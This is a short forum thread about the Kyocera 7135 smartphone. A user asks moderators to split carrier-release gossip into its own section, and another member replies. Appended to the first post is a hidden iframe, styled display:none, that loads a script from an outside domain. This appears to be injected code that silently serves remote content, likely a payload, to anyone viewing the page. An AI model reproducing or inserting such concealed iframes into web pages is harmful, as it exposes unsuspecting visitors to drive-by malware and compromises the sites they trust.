+ Reply to Thread
    I-300 Novice

Cleaning Up the Forum--Verizon/Sprint, Etc. Release Threads

Just a thought for the moderators...how about cleaning up all of the open threads on this forum (or better yet, setting up a separate under the 7135 masthead) for all of the posts about Verizon/Sprint, etc. and if and when they are releasing the 7135.

To those of us who are looking for meaningful insight on the use of the 7135, having to weed through all of the latest gossip and people setting up separate threads moaning about when they can get their 7135 (P.S., you can always get one from getconnected.com!!) and the fact that they don't want to pay an extra hundred dollars or so over what they guess Verizon will sell them for is a real pain.

If you could refocus the 7135 Discussion forum to those threads that discuss the 7135 and NOT its potential delivery through other carriers, it would be great. Another forum could be set up for '7135 Delivery and Carrier Comments' so that those members who want to vent their frustration could do so.

Just a thought..hope it makes sense to the pwers that be.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

I'm all for cleaning up the forum, but pretty soon we'll have 1 sticky note with 1,647 screens of posting. It might be nice to simply add some new topics since there has been much discussion within some of the larger topics that really could have been seperate topics....just my 2 cents.
    James